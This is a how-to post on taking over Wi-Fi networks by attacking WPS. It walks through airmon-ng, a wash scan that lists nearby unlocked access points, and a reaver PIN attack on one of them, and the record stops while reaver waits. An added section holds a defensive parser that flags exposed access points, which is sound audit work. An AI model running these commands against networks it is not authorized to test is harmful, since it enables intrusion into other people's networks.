In our previous how-to we looked at the steps required to break WEP. WPA is the successor to the WEP protocol, intended as a secure replacement for the flawed and insecure WEP. WPA introduced TKIP, whose purpose was to improve data encryption: TKIP enhances security by changing the key after every frame, which makes WPA much more difficult to crack.

WPA vulnerabilities

  • Packet spoofing
  • Weak key usage
  • Authentication issues with MS-CHAP v2 (Microsoft Challenge Handshake Authentication Protocol v2)

Cracking WPA

Start airmon-ng

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  500 NetworkManager
  673 wpa_supplicant
  690 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation WiFi Link 5100

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Make sure the wireless interface is in monitor mode

# iw dev
phy#0
	Interface wlan0mon
		ifindex 4
		wdev 0x2
		addr 00:21:5d:d2:1f:ee
		type monitor
		channel 10 (2457 MHz), width: 20 MHz (no HT), center1: 2457 MHz

Now we will locate WPS-enabled access points with a tool called wash

# wash -i wlan0mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
mod by t6_x  & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
02:BE:F5:00:22:EE       4            -73        1.0               No                A-TEAM
40:65:A3:61:41:6E       6            -87        1.0               No                BELL416
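
The wash table above is also what a defender wants to read, since every row with WPS advertised and not locked is an access point where WPS should be turned off. The following parser is an added example, not part of the original post or of the wash/reaver tools; the sample output is constructed from the two rows above plus two made-up rows, and the WashRow type and function names are my own.

```python
# Added example (not from the original post): parse the table printed by wash
# and list access points that advertise WPS and are not locked. Those are the
# ones exposed to WPS PIN guessing, so they are the ones to fix (disable WPS).
import re
from dataclasses import dataclass

# Constructed sample: the two rows from the page plus two invented rows.
WASH_OUTPUT = """\
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
02:BE:F5:00:22:EE       4            -73        1.0               No                A-TEAM
40:65:A3:61:41:6E       6            -87        1.0               No                BELL416
AA:BB:CC:DD:EE:01      11            -60        2.0               Yes               CORP-GUEST
AA:BB:CC:DD:EE:02       1            -55        2.0               No                Front Desk AP
"""

@dataclass
class WashRow:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    wps_locked: bool
    essid: str

# One data row: MAC, channel, RSSI, WPS version, Yes/No, then the ESSID,
# which may itself contain spaces, so it is captured as the rest of the line.
ROW_RE = re.compile(
    r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(\d+)\s+(-?\d+)\s+(\S+)\s+(Yes|No)\s+(.*?)\s*$"
)

def parse_wash(text):
    """Return the data rows of a wash scan; banner, header and divider lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            bssid, ch, rssi, ver, locked, essid = m.groups()
            rows.append(WashRow(bssid, int(ch), int(rssi), ver, locked == "Yes", essid))
    return rows

def wps_exposed(rows):
    """BSSIDs that still accept WPS registrar attempts: WPS advertised and not locked."""
    return [r.bssid for r in rows if not r.wps_locked]

if __name__ == "__main__":
    for bssid in wps_exposed(parse_wash(WASH_OUTPUT)):
        print("WPS enabled and unlocked, disable WPS on:", bssid)
```

On a real audit you would feed the saved output of `wash -i wlan0mon` to parse_wash and compare the result against your own AP inventory.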

Now let's start reaver to retrieve the WPS PIN of the chosen access point

# reaver -i wlan0mon -b 40:65:A3:61:41:6E 

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
mod by t6_x  & DataHead & Soxrok2212

[+] Waiting for beacon from 40:65:A3:61:41:6E

Please note that, depending on how much traffic the access point generates, it may take quite some time to complete.